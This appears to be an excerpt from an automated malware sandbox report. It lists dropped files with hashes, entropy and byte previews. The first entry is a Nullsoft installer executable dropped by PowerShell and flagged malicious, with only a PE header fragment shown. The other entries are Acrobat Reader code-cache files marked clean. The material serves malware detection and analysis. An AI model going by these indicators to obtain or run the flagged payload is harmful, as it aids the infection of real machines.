                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):344681
                                                    Entropy (8bit):6.7218967633534605
                                                    Encrypted:false
                                                    SSDEEP:6144:bmOPbtybqh+/fDv9vE520B36t/21/F99OjpiN6:ft2W+nz9s520j999OS6
                                                    MD5:9DCA43CB15D97693D2DE73683804C5C7
                                                    SHA1:3BF61BC542DB16E0A045505C2868CD12CFCAC769
                                                    SHA-256:C3AC750A23FB48EEE9E1CE2D9BD59AADBC190A1DD36AFBDC9F5C39EEB7F87756
                                                    SHA-512:26A0870AE04D5939C410F31B1755D0AE37658921536D6C6A02FA59003B5CF3AD1FC5D4DA919DD1B6D58B451210BD46084E74FD44C8988065FEE78B88EB122549
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.......................................@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...P...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):205
                                                    Entropy (8bit):5.628669466826565
                                                    Encrypted:false
                                                    SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuV9SRVvYMktIJiTFJrqzOJkvP5m1:men9YOFLvEWdM9QiSzgltIJi7Z+P41
                                                    MD5:140F85347B51280C00575BEA6ECD8884
                                                    SHA1:598FDD5E7C12ACE7F849571989627CD9DFCC288C
                                                    SHA-256:63E6CC5E8E701E86C737DF57602351CC440BB985C29E3DE2EE3F68D65993EB8E
                                                    SHA-512:CB85CD255417CF06491E2ED7A3DA07D4890E3A7037D4AFC9A86E68C4AFB4638A764FEE76120311302DDE7219C3F66EB3BF7FB2C8DF7BC8FF3A92481B5E973C27
                                                    Malicious:false
                                                    Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ......[/....."#.D.40.;..A.A..Eo.......r>............d.{v.^.G...d.W.:...P..k%..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):174
                                                    Entropy (8bit):5.487901261701354
                                                    Encrypted:false
                                                    SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWVgqwaldE/MktUSllle98fZe/O+/rkwGhkg4m1:mi9NqEYOFLvEk6alUltF/48Be7Ywcr1
                                                    MD5:240ECC69BDBE7D85C5202E60F525150A
                                                    SHA1:0DD856BA0B4F8B6CB823CB58E57CE7590451341C
                                                    SHA-256:3A993D602BB22EE07C1462CBF2D526DD84A495A6E2ADFB72BDAE5DE06AD9F6E6
                                                    SHA-512:532FD7C7C5328BDADCE0D951F0FA0A3CD8DFE9D5914010062D819D32E696724DA01DA16A25804F4D2B8B00FE040A74D6A79119D79FEADB9F1FA3AFC8DEBD365B
                                                    Malicious:false
                                                    Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .E.o..[/....."#.D....;..A.A..Eo.......x0[.........1.x.'.vI..*|Z..o...+.4....0..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):5.538808774163056
                                                    Encrypted:false
                                                    SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhu/tllTu9hltu4t/RlUoSjGY1:DyeRVFAFjVFAFR/S9I4tZlUo6
                                                    MD5:8B9AAFF922388B5CCD61A909B37EB0C1
                                                    SHA1:059A0E8131D4CB0EF1BC4A7DCEC9CE13FE887971
                                                    SHA-256:76561D86CDE60347F8815CCCB3A0EB9D893D4A063EDA8F2EF0A88B20A791F9C2
                                                    SHA-512:6748EC756C301B3385005B27E2B7CE56C7A5F2FA1441DBED485CF38CD0E4ABBC9A3EC1ADB7548EE70BB5F1F2197DCACEA4B7A8400AF0F936BD1517DAE8E4DE6D
                                                    Malicious:false
                                                    Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .c..[/....."#.Di. .;..A.A..Eo...................hvDO.N.t@.....n.*...... ....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.5855350763704825
                                                    Encrypted:false
                                                    SSDEEP:6:m+yiXYOFLvEWd7VIGXVu7olWhltRVyh9PT41:pyixRuNolWjnV41T
                                                    MD5:479E97367AAA52F76C0C3940DC7806E6
                                                    SHA1:F596AE5A72709C35E1EEDB931C78D356B31153F4
                                                    SHA-256:BBA6C31F64F1CBCD4BD00EE37981FF026CC36069BF643B8F1071656CE0E190F8
                                                    SHA-512:B2849C74BB5B2E910CFB1BBA2A75649368523463C87D89DEC4EDDEF0C4A6E1735088F3503E4884CED806C92AD5D6235D6B1196CB93C942BBFA8EB178D088425A
                                                    Malicious:false
                                                    Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..^...[/....."#.D%.#.;..A.A..Eo........@w........k.Q.....-_..y.....O...>..1....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):216
                                                    Entropy (8bit):5.647156122295386
                                                    Encrypted:false
                                                    SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVYCHJu8qMktd//xlYo2sZI8xeGvA:mvYOFLvEWdhwjQv4VqltdT3ZIl6P41
                                                    MD5:2778320CEBF069BDEA704E6E43E8AA7F
                                                    SHA1:5831B79EF51D0C56B90ECE8FD918CE6BFDE01935
                                                    SHA-256:374C1BAF9C1025B53E20A0945883A2E6AF7B4DFC2E7910AFFBA55B437FEA0336
                                                    SHA-512:596B79ACD56EF92946BF6457A619480201A54055A5682027CA0564BD080906B526EFCAF145DB3A728542F3E0E857DEDA4252ED415F032AED4BE205041941CCD6
                                                    Malicious:false
                                                    Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ......[/....."#.D....;..A.A..Eo......_<^..........].>....uUf..N...k......c..l.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):209
                                                    Entropy (8bit):5.52377031852074
                                                    Encrypted:false
                                                    SSDEEP:6:mJYOFLvEWdGQRQOdQCKl/q540hltJW/l9D6g1:2RHRQCAqxjjWbD
                                                    MD5:8AB2F47D6903B3234135D13FAE33C8A0
                                                    SHA1:1C8E9CBE56F5DE634B68EAB487EB085D11542670
                                                    SHA-256:50D39F4A8914E911A672FDC239E1BD47D617197E607D55C63BE1A92C11925C68
                                                    SHA-512:187B75422BE296B2D7E4D9B93C91FFAB035BFB05F386450D35AD6C6862331299E3D76856D8E752E7D1C5E051691CEF46B4C1A464172BA7C640F1D6E6A3069200
                                                    Malicious:false
                                                    Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ......[/....."#.D.-.;..A.A..Eo......g.'_..........c..y/L....|y.n..C/I.....X7-ne.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):179
                                                    Entropy (8bit):5.566046214194962
                                                    Encrypted:false
                                                    SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuV6llaWns1qMktzlQMWqg4nRb7om5m1:mOYOFLvECMLOlaWs1qltauR/41
                                                    MD5:70241EAEEB07AD723DA5FA0CC3D1D505
                                                    SHA1:ECD07BB4BE90AE46EB792C297451D85D3FF00606
                                                    SHA-256:4E3084F3FFF672B5D5BCBB001FD11B1DDA1B65E105459627E11CFD5BCD3C6F35
                                                    SHA-512:5E517A449A53A1B8A1E000A97109269AB5E89DEA73CCFA4A72C258EC6773D0A8F1B506E4DA923BED14A6810CDFCA909774E550483B73002D3E6F14DE9AC85582
                                                    Malicious:false
                                                    Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..o..[/....."#.D.3.;..A.A..Eo.......k..........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.543023583704141
                                                    Encrypted:false
                                                    SSDEEP:6:m4fPYOFLvEWdtuM1L9hlt/by0zBUKSAA1:pRP1L9Zb
                                                    MD5:32EC8465FF7DD6A118B632B79852C2DC
                                                    SHA1:02CC792C7B65171AEAC517711A87D0F45271B2FF
                                                    SHA-256:5C9C0F9EEA2A3990906D174BF874795BE0DD6C52EEB58A336A3EE19C48DF9D31
                                                    SHA-512:082562CB001E2E5C3F4BB5215ACB5908481979922C4BF224AA218CF8FA16EA4C9EFFB48D825D84F3EB0945B5AF1E30C41DD0E17EBF1698A64565886EB77E76CC
                                                    Malicious:false
                                                    Preview:0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .....[/....."#.D....;..A.A..Eo.......5.........Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):177
                                                    Entropy (8bit):5.528010224201159
                                                    Encrypted:false
                                                    SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvqu+KlllgBn/1MktMfkd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvqu1/lgRtltUkjg
                                                    MD5:96A1698CD86A075534C8FDDCD8B12300
                                                    SHA1:21E5FC48653618D4309C90D619576552D338B942
                                                    SHA-256:C709A33BA0A5FEBE7CE4CBF99838EAD6B9012D10E4C03B7BB59C0F6AB09DBA22
                                                    SHA-512:BF20206C22DD2517BD63E6DBD8801A077EEF8C9CA6298F95EC114371585EA13BD730509AFA3AE9F0955866B974503884FA9E38D83AAEEACAC404E16A80073270
                                                    Malicious:false
                                                    Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ...o..[/....."#.D.$.;..A.A..Eo......Kc...........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):187
                                                    Entropy (8bit):5.562642110688597
                                                    Encrypted:false
                                                    SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLge1l/ZnYu/Mkt0/RUPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLge1l/ZBlt0KPqVyMx
                                                    MD5:E1F941F9D2F09A305CE4EC7D41F6474A
                                                    SHA1:34DE3C2878898E81A7678EBB88A11EACA7ED5FF1
                                                    SHA-256:AEEAF0336549AD7998461A07D9A95D1FFA56A6AECE6012B056058211BC14FD1C
                                                    SHA-512:F48D693BF848ACFA60CD718C9D6020D761521BDD9E81251D546345075EDF6EA798736AB43C54990D8B607412C54441CF629E5D8DE06A57E691D792FEE5B7C8E6
                                                    Malicious:false
                                                    Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .<{...[/....."#.D....;..A.A..Eo......=.]...........q.O...j....._y..L^z...?..@N..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):244
                                                    Entropy (8bit):5.636900786213776
                                                    Encrypted:false
                                                    SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyNlClt8twSeKaT9pr1:URVFAFjVFAFslIGtwSeKaTL
                                                    MD5:B87DDD2A4C67D80A62C7D20E81BDF085
                                                    SHA1:322AA0A7D85EA307F3567CE4EF2E792548228EE0
                                                    SHA-256:51E0F65CF1E645E2FB9F430946D755C0FD6885FE5C1D3E63852A8D68885CC826
                                                    SHA-512:068F23408FCBC2A49653657FFAD355B6B048B27FE2156B86C3124E67C3FA67FFCBE214B3DB586040BF6C05130625EE973A39111C935A85394D76AC38B77BCF3D
                                                    Malicious:false
                                                    Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .(....[/....."#.D).'.;..A.A..Eo.......................H...{...2../.k`..r4.C. .A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.548785642692847
                                                    Encrypted:false
                                                    SSDEEP:6:ms2VYOFLvEWdvBIEGdeXuq/lk3hltEg11:BsR2Eseh/lk3ji
                                                    MD5:F4ACE86F07D433D4E0143D9B4C605EA1
                                                    SHA1:1C92B1DCF2962CF2F64E9CF3D277926A2F063F18
                                                    SHA-256:3D7FDBC75BB34C204A195F04DFDFB9D023288BD6D75F0B0A02B639038A171D2F
                                                    SHA-512:87795DCB1E704F55FC8A7722FA95FBA8A2CA6703C5DAC71936D6C506B3A174B8F3A835ECBD34F4E869483949FFC57919A593E06B613FAE98B1311753FF636588
                                                    Malicious:false
                                                    Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .1'...[/....."#.D5c!.;..A.A..Eo......Z...........A.o]@r..Q.....<w.....].n\....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):202
                                                    Entropy (8bit):5.691202253852212
                                                    Encrypted:false
                                                    SSDEEP:6:maVYOFLvEWdwAPCQns1ltMxm7OhKlvA1:RbR16sg+xmJ
                                                    MD5:818BAA62C00145262DCF51CF8C1AA662
                                                    SHA1:AB3AFA8C029923F70D06D1C44547B91B622D72F8
                                                    SHA-256:067221AB727B76738233FAE5AEA85B30818A3A2AA2CFF40E7319E7DDF99E4876
                                                    SHA-512:27480B84F9B280ED4F89213AC30CC1AD6B3AC84DCC6C6F3A0807A75AC87C938E4E0DBD005ABB89636624C1F3D73075C7F21E9B86FFC506ABABCB43940FDB8989
                                                    Malicious:false
                                                    Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ......[/....."#.D....;..A.A..Eo.........6..........4T].....Tw.....(..b...EO....9.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.616678666196606
                                                    Encrypted:false
                                                    SSDEEP:6:ms2gEYOFLvEWdGQRQVuMkln3hlt9IlddFt1:B2geRHRQfkln3jHY
                                                    MD5:26619F85BC4E40D69E3E567050EB72B6
                                                    SHA1:0AE40E1C2E0232E7FF775F37510C6E691B502B22
                                                    SHA-256:5D17F7201C56A42546C4968A523DDD26045DF042CA94F125AE33A6C1BB79CA22
                                                    SHA-512:138C3BC9155387BF67C31CF083CA58322A8965571CDD5BCBDC45C0035F2E563D98AE8D73B9C91EA00C686FDFFDF87F4EA20CC1575F3B8BBBE9B373900DECCB6A
                                                    Malicious:false
                                                    Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js .i....[/....."#.D.P!.;..A.A..Eo..................@..{o]...9o|..qY....T....{..u.b..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):206
                                                    Entropy (8bit):5.638034623330599
                                                    Encrypted:false
                                                    SSDEEP:6:mzyEYOFLvEWdrIOQDWi9hlt+tuEt1S/1:WyeRlEWi9IuEt1
                                                    MD5:A194A7B2CEE56E1B641FA93A559DB57C
                                                    SHA1:9F7813AAF78A465286C1A26DD0FF8C157CA5BD0F
                                                    SHA-256:3A58CCD48250B96B84B2F2E5B0F1E7C529A252F5A2C08DECDE118A3C6F4BF653
                                                    SHA-512:9BF91D2EEAC02AA584B1ACD670412A5BD57888DDA2F6C9AED29A8104141C7BE1B40D2D948BF3C3A3543AB6F42AAB1EBF5BA6BF3534F44A5C0E71CCFFBF2674A5
                                                    Malicious:false
                                                    Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .4....[/....."#.D....;..A.A..Eo..................t\a......x5.'OuE.C..@......x..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):218
                                                    Entropy (8bit):5.550290192234075
                                                    Encrypted:false
                                                    SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvBaJ1tHju/MktGzHwlwJNqww6U+5y:mnYOFLvEWdhwyum1Du/ltFlwrqwK+41
                                                    MD5:98035BE94BB273E35378975BC01288D8
                                                    SHA1:CB010361808A2AAAE8B67F4CF0B40EC0685CB71E
                                                    SHA-256:A64240A0B7DA71C4D16A06471E976D5EEA60969B15A57FE0D0423C8E7447A16C
                                                    SHA-512:322E34B093D337B45F00576D084967AEAEFD98A077467AAC1135BA556E1B3CFF32379798EB6783543B877FE6D3E3F10B81D7EC30A5BE65697A6A16D5E1FAD713
                                                    Malicious:false
                                                    Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ......[/....."#.D.t..;..A.A..Eo.......S\H...............7...o..a=.98I......(3.$G.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):230
                                                    Entropy (8bit):5.57859062450931
                                                    Encrypted:false
                                                    SSDEEP:6:mYXYOFLvEWdrROk/RJbukK8Thltt4fO441:/RrROk/tK8H8fL
                                                    MD5:251CD688A8C267C18AAE23D33557C485
                                                    SHA1:C6214525DBF01C4A8160B0EBF83833C2536DD00D
                                                    SHA-256:313BB04676A3F319C361482E6DEDA903F299CF80F0A6490D324ABE4857334B69
                                                    SHA-512:27D92B711F0599898A4E1ADD00BF54BD24C0A6B0FF1F1146ED8B75FB3D9B0565CD86F6346C213DE35DE1E866B243B96411F3A14F6EAFC519B24DA901477A5320
                                                    Malicious:false
                                                    Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..a...[/....."#.D.b..;..A.A..Eo.......WZ...........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):186
                                                    Entropy (8bit):5.588810987211443
                                                    Encrypted:false
                                                    SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVWd/ZG78qMktCllRzoIN1OFPL4m1:mmDEYOFLvEWXIWd/2xltm3zV1QPLr1
                                                    MD5:B2B483860F9178D07FEB6785068E398D
                                                    SHA1:781CE644C8C25123F08EC591A15B7833DA8EFD59
                                                    SHA-256:568CD590E279A466D83159042C3CABECE85C2B745924AA03A2A0D01E72454265
                                                    SHA-512:610C8C16058D58E053906E5786FD6D53411EF6D98CC6461F64908F98DD04506498C3D5B7E3A498AF5FA426D8733E5C6984D4039760824DB81354964B7B6C13AB
                                                    Malicious:false
                                                    Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..`...[/....."#.D....;..A.A..Eo....................~]...%s..<...n.f..<.....1#..U..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):207
                                                    Entropy (8bit):5.585972229111599
                                                    Encrypted:false
                                                    SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFve+ll5ok9hMktG9E8D6EsEJeUm1:m52YOFLvEWdMAuXl20hltG9EEvsEJ41
                                                    MD5:9483DC3D7F506A9805A261266E989CD7
                                                    SHA1:CBD55BCFD8388EA40D7A392EC33D129955211532
                                                    SHA-256:80E496AC3B40C4A0B540815A7D2B2DEFCC68E5CA6989A18B06B70CC88C2E498F
                                                    SHA-512:CDF47C97ED4C93D9A11F0A8848C2F1931F61BEAF0FB611C538C94DF0E4588EC9D978A9ED28243AA0561A367AA4B8F4F12574B739F617C3818550A14DEE34F79F
                                                    Malicious:false
                                                    Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .rA...[/....."#.D..!.;..A.A..Eo......7v5I..........z._a...'.v.......4p3..1.']...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.622093724005559
                                                    Encrypted:false
                                                    SSDEEP:6:mYilPYOFLvEWd8CAdAuvlx3hltk4ong1:6lJRklFjfo
                                                    MD5:9B94F105984E2634FF961EE4A1C61D10
                                                    SHA1:1BD7C2E6E985260D4B1BEE512A916378F2A5D69C
                                                    SHA-256:2E6D4CD59423C1F2EDA2BDC1E494567D1D0CF198BA8B0B9B319CD0BDFB1B6B6B
                                                    SHA-512:C1D746FBFF774172E26A547452159C4E2AA02FED31D8B94F35A150C2F51FAD44606C82219BF3B6499CADF6F2384622E47B976C1DDED716AD217658B096038A90
                                                    Malicious:false
                                                    Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..B...[/....."#.D.!.;..A.A..Eo........<........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):223
                                                    Entropy (8bit):5.586840623927083
                                                    Encrypted:false
                                                    SSDEEP:6:mY8nYOFLvEWdrROk/IupprMiqltYVN16wG1:F8hRrROk/trpQW
                                                    MD5:E120EDD07F7ABC21267E4D60F1105150
                                                    SHA1:F079BF90A34E3EFB38D612D1EC5C0B4ED17BF6BB
                                                    SHA-256:F3E470D8F169FD374FE5A59DD587C506F94C8F6232E634FEFAB9F8EE1D8852C8
                                                    SHA-512:6ECBD29A3036F92EE1B4BD06D501A7621A5BF7AD05E642C8B4A929D16454F59270D4EB74800F82384F218BB68D625B082F11011E6755B5E414894291382295EB
                                                    Malicious:false
                                                    Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..]...[/....."#.D....;..A.A..Eo......se.Y..........%.k.SZ..~W.....:)'B..ad......A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):213
                                                    Entropy (8bit):5.64206838944888
                                                    Encrypted:false
                                                    SSDEEP:6:mLrnYOFLvEWdrIoJUQ81tr40hltJoeJIi1:ehRcvtrTj8eJI
                                                    MD5:C85126C4EAA61E2935ECE8F0C33FBC62
                                                    SHA1:0A7F79D339C45A0EB57399D3E4152DC2B8E6C768
                                                    SHA-256:AC4EC8A778410CD0170248CF1E371A71BF90C7C261F234CB158683CDEE9579D2
                                                    SHA-512:F428E119519365DE7E017CF08B3256C62B45A1681AE8089EAFCEFC991ECE3D0C8102211F8EF467BB786D0592E5231415BD6745571DA410F2755867FD9A48EE6F
                                                    Malicious:false
                                                    Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .n....[/....."#.Di...;..A.A..Eo........n..........;"./N_.,.:C..2....9L.H...3:...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.574793636109528
                                                    Encrypted:false
                                                    SSDEEP:6:mOEYOFLvEWdrIhuJKtQltF/lnzgm2d/1:0RjKtCr/5R
                                                    MD5:5F7AF8CEA92954B5953BD8894BB6E325
                                                    SHA1:5DAFDAF14A899631FB8BE994C1E54FF4D693A6B8
                                                    SHA-256:E76E5B8806383E2395A9B2AD6008EB5F3160C0877A34EB024D6E160EB7DBC008
                                                    SHA-512:14C4C5DB8A2E46C635961EA5EFA6399FFB3BE25274C127D91C5D6C8A8E3A6167F56678A01F2FA8C2F61120F4BE636DEB0F6D94E97ACAA80263E41DAA4CE11063
                                                    Malicious:false
                                                    Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .%/...[/....."#.D....;..A.A..Eo.........{........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................

